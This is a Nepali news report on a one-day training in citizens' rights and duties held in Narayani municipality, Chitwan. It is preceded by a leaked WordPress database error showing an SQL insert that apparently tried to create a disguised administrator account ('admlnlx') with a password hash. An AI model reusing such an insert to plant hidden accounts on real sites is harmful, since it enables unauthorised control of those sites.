WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BzguP2aZ9IlVrP1/26u28BDvD9RK0t1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-25 09:41:24', '', 'admlnlx', 'admlnlx')
चितवन, पुस १३–
महिला सघन विकाश केन्द्र खैरहनी–८ पर्साले नारायणी नगरपालिकामा सामाजिक परिचालक, वडा नागरिक मञ्चका संयोजक, नागरिक सचेतना केन्द्रका संयोजक तथा प्रतिनिधीहरुलाई एक दिने क्षमता अभिवृद्धि तालिम दिएको छ ।
स्थानीय स्तरमा नागरिकले पाउने अधिकार र दायित्वको विषयका बारेमा सहभागीहरुलाई तालिम दिईएको थियो । नागरिकले आफूले पालना गर्नुुपर्ने जिम्मेवारीको सवाल, असल नागरिकको कर्तव्य वा जिम्मेवारी सम्बन्धि कार्यक्रमहरुको जनचेतना जगाउनुपर्ने व्यवस्था सरकारले गर्दै आएको छ ।
तालिममा वडामा रहेका सामाजिक परिचालक, वडा नागरिक मञ्चका संयोजक, नागरिक सचेतना केन्द्रका संयोजक तथा प्रतिनिधिहरु, पत्रकार लगाएत गरी ४० जनाको उपस्थिती रहेको थियो । तालिममा सहभागी वडा नागरिक मञ्चका संयोजक, सामाजिक परिचालक तथा नागरीक सचेतना केन्द्रका संयोजकहरुले आफूहरु अहिलेसम्म थुप्रै हक अधिकारबाट बञ्चित हुदै आएको र यस तालिमले अझ नयाँ पाठ सिकाउन मद्धत गरेको बताएका थिए । नगरपालिकाका कार्यकारी अधिकृत रमेश सुवेदीको अध्यक्षतामा भएको कार्यक्रम महिला सघन केन्द्रिकी कार्यक्रम संयोजक चन्द्रकला चापागाईले कार्यक्रमको बारेमा सहजीकरण गरेकी थिईन् ।